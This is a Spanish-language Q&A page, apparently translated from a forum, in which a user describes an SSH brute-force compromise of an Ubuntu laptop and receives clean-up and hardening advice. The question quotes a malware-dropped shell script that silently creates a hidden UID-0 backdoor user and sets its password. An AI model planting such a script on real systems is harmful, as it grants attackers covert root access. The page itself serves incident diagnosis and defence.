GNU/Linux >> Tutoriales Linux >  >> Ubuntu

¿Cómo lidiar con el malware en la computadora portátil?

Estoy bastante seguro de que mi computadora portátil Ubuntu 13.10 está infectada con algún tipo de malware.

De vez en cuando, encuentro un proceso /lib/sshd (propiedad de root) ejecutándose y consumiendo mucha CPU. No es el servidor sshd el que ejecuta /usr/sbin/sshd.

El binario tiene permisos –wxrw-rwt y genera y genera scripts en el directorio /lib. Uno reciente se llama 13959730401387633604 y hace lo siguiente

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

El usuario gusr fue creado por el malware de forma independiente, y luego el chpasswd se bloquea mientras consume el 100 % de la CPU.

Hasta ahora, he identificado que el usuario gusr también se agregó a los archivos en /etc/

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Parece que el malware hizo copias de todos estos archivos con el sufijo "-". La lista completa de archivos /etc/ que fueron modificados por root está disponible aquí.

Además, el archivo /etc/hosts se cambió a this.

El /lib/sshd comienza agregándose al final del archivo /etc/init.d/rc.local!

Eliminé al usuario, eliminé los archivos, eliminé el árbol de procesados, cambié mis contraseñas y eliminé las claves públicas ssh.

Soy consciente de que básicamente estoy jodido, y lo más probable es que reinstale todo el sistema. Sin embargo, dado que inicio sesión en varias otras máquinas, sería bueno al menos intentar eliminarlo y descubrir cómo lo obtuve. Cualquier sugerencia sobre cómo hacer esto sería apreciada.

Parece que ingresaron el 25 de marzo mediante un inicio de sesión de raíz de fuerza bruta. No tenía idea de que root ssh está habilitado de forma predeterminada en Ubuntu. Lo deshabilité y coloqué denyhosts.

El inicio de sesión era 59.188.247.236, aparentemente en algún lugar de Hong Kong.

Obtuve la computadora portátil de EmperorLinux y habilitaron el acceso de root. Si tiene uno de esos y está ejecutando sshd, tenga cuidado.

Respuesta aceptada:

Primero, ¡saca esa máquina de la red ahora!

En segundo lugar, ¿por qué tenía habilitada la cuenta raíz? Realmente no debería habilitar la cuenta raíz a menos que tenga una muy buena razón para hacerlo.

En tercer lugar, sí, la única forma de asegurarse de que está limpio es realizar una instalación limpia. También se recomienda que comience de nuevo y no vuelva a una copia de seguridad, ya que nunca puede estar seguro de cuándo comenzó todo.

Relacionado:¿Comando para determinar la IP pública?

También sugiero que configure un firewall en su próxima instalación y rechace todas las conexiones entrantes:

sudo ufw default deny incoming

y luego permitir ssh con:

sudo ufw allow ssh

¡Y NO habilite la cuenta raíz! Ciertamente asegúrese de que el inicio de sesión de root ssh esté deshabilitado.


Ubuntu

  1. Linux:¿cómo encontrar el controlador (módulo) asociado con un dispositivo en Linux?

  2. ¿Cómo sincronizar el Root Gedit con las preferencias del usuario Gedit?

  3. ¿Cómo instalar la impresora con Ubuntu?

  4. Cómo configurar ssh sin contraseña con claves RSA

  5. SSH:cómo incluir el comando -t en el archivo ~/.ssh/config

Cómo cambiar la contraseña raíz en Ubuntu 20.04

Cómo administrar de forma remota el servidor Ubuntu con SSH

Cómo cambiar la contraseña de root en Ubuntu

¿Cómo cambiar el directorio raíz del dominio principal con .htaccess?

Cómo restablecer la contraseña de root en Ubuntu 22.04

¿Cómo deshabilitar el inicio de sesión SSH para el usuario raíz en Linux?